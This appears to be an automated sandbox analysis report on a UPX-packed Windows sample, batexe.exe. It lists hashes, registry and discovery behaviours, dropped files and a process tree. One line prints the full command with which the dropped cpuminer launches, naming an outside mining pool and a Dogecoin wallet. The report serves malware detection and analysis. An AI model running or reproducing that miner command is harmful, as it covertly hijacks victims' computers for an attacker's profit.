73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 18:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
3240	b2e.exe
4012	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4012	cpuminer-sse2.exe
4012	cpuminer-sse2.exe
4012	cpuminer-sse2.exe
4012	cpuminer-sse2.exe
4012	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1168-3-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1168 wrote to memory of 3240	1168	batexe.exe	85
PID 1168 wrote to memory of 3240	1168	batexe.exe	85
PID 1168 wrote to memory of 3240	1168	batexe.exe	85
PID 3240 wrote to memory of 3260	3240	b2e.exe	86
PID 3240 wrote to memory of 3260	3240	b2e.exe	86
PID 3240 wrote to memory of 3260	3240	b2e.exe	86
PID 3260 wrote to memory of 4012	3260	cmd.exe	89
PID 3260 wrote to memory of 4012	3260	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1168
- C:\Users\Admin\AppData\Local\Temp\7BC3.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7BC3.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7BC3.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\98A1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7BC3.tmp\b2e.exe

Filesize
4.9MB

MD5
3abe1b0559beb7a5d25785748af4dd6b

SHA1
9feec58916e224274cb91f5f1242ff9847104f8b

SHA256
c4e6f6a8c4133ca0d85270cc0f9eb892d6c108752a61f4428717ed63cf434804

SHA512
b3e75a7d8c9f5797617551c5aee4e5beafc05b9260c8ad4f8cce30be152a67f8fdbbcde5c2c0f98b5bb0cf47332102b290188611813e117de24383b894203a17

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BC3.tmp\b2e.exe

Filesize
5.2MB

MD5
c637490b7233fbfa98a61c8f9bf06f85

SHA1
1c1b0b609f0b7778fc203223e4c5e33165e5f632

SHA256
f2e9387a25bd1799cabcf17c6e6aca0fb94983c31df6c20fa6748e46ba2f3bee

SHA512
05250679ecf519bb13f019b62e66ad0cd5cf1e92fe87b03cbc4f4d4290aa084ae60b5723a2e5ef22852a0896b7d5934deb57ffd3a3ea10e1665028cb15bbca73

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BC3.tmp\b2e.exe

Filesize
7KB

MD5
ada966fd37654fe18f22b8cadde70649

SHA1
7fb9b18f9b10757b7678a30bec8b1272592834c5

SHA256
03c54c585de917c64ca50dd76cf8835bc0c942331dc96a6759621c48dae7c215

SHA512
ece7c45c2600693a63113a5a1e87c885d1a1da0aa20a12ea8fc85de8ff8930e50b58691bff76104d93d1527f3b1febbf700eb38836ede7e6e45906f2acbb05ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\98A1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
7bdf66fe9b3f5e169cb397c67f8e3525

SHA1
5dd6ef8402a61b4197d8c805f010bc446fac7d71

SHA256
9e54ea61e626b07165482e1485f217beb0e1182358a231c7cf453f0ff2250ca8

SHA512
71be8a1e269b5569e0e205127b3e6fa2478c988f1322262f4e6b74a06cdcd810ac9a9cf7392180a77e8a6f159ac39be1238b5db89106ede61072b2e5c13ea25c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
696KB

MD5
7155b36930c7ad6f889cfe06948447b6

SHA1
607520a092a631c8b0eb6b29f33b43616a919988

SHA256
acbc1cd131ee3e4fada7a1761acf7d01cce22e15d07ff3fe219d5b40687d3525

SHA512
4d2b42f65a29109cc07d0d043859d568a155474a70430e15628d82bf68d9033083710d68b76a5a723a1a5c3bf2ecbdb8576044ccccdf80878d126e271a72a801

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
674KB

MD5
f0b02b2b2d2549f4ea86511a0c08223b

SHA1
78f1a00c82fbafbc687fe7e18754243d27ba80b0

SHA256
7cb665ef3d9ef870053a3939421264ecc1624314aec268a7931a4cf7f705def7

SHA512
d730161172b05a818206ce628b9a183b34cfb274333d0aac3f83137d6e15398c65b52e364aa6988a3f89cc4876927c5b9ee22d53a5e18a51e711ab7adf16c99f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
682KB

MD5
54f390a2d9d002b31be566fd74b59122

SHA1
67618c75152a5960ac81c6776680279950d74ca3

SHA256
be0495ef432bed30393fef10263bbf40f7b4708d86560510664ef9785bf0e303

SHA512
65d23ab710170bad494043519722f6cdadc2a6d7214b1a9584f272a4d0dfdd1612aaaaf035c88101f6381444530caa85e02000cfef82f63d3ba2f97e46b287ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
503KB

MD5
970a585a899173701ba50ee7f8a2807c

SHA1
b6e33293ac48d7a8f5fc4a1eaa8f355b704671f5

SHA256
cc9a4523c9c8a8cf1e2a0c567e28573d8158e1e0b1b8f3f87439b6e60e63d573

SHA512
80feac905b29b1efe29e85efb824f54741871e364d43cc6a7e57d0252ba8795f490af91f4dc0a5f5033da93ca86b106d01e7a46c015141b1df29564e515d4ab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
693KB

MD5
b32e4484e7b5e9fb69425a09b058688c

SHA1
3e6fb136368fd6c9d9474c00cf56c60c455fda45

SHA256
adb979d9b0fb98065cd93c8a7277d8eaae7f43cbc14c274d845b5b2d586b381b

SHA512
a0f110b98aa635f62736919e228619a32f67f4c351e53855f726a17dd87cc99d6387224997e0b62d22a8f606f2e2d326da8a5cdf063338626b4de60f88d5a153

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
37cb17d2470e004d544bf1165e90bacb

SHA1
08dc8a4e4e595a5f95209952a8506ba031daf3cb

SHA256
070c015dae37e1f859adc340966dcdeb1a968bcf0e65b0db0c147268b3c349e6

SHA512
433aa054d05ea19241f7804dfd57c9cea545ed90817ed97b45a3dcf83b35e538b9d5a3880e4c3e4aed8e5cc613a3651f700a85766ba89dcab45e544307ea62c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.3MB

MD5
dd5b5764776ba34b49df226799e01c44

SHA1
276863a6ad7fc72e6215903cbf6946fd0aa07ee4

SHA256
f571eb5dd945d33364f88d2972d0e28df12fc1389b1a77c24bf60fd4248a6a03

SHA512
7677d2224282f01356848610e5d1e2f71b5ad0c2352a1d7b3b3b571cdf2d06964b9d54048d4f49f28f95a8ead022854c88d443b8516e60c989cc4cc1c48ad2ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1168-3-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3240-54-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3240-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4012-44-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-46-0x0000000051D90000-0x0000000051E28000-memory.dmp

Filesize
608KB

Download
memory/4012-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4012-48-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4012-49-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4012-55-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-60-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-65-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-70-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-75-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-80-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-90-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-95-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4012-100-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download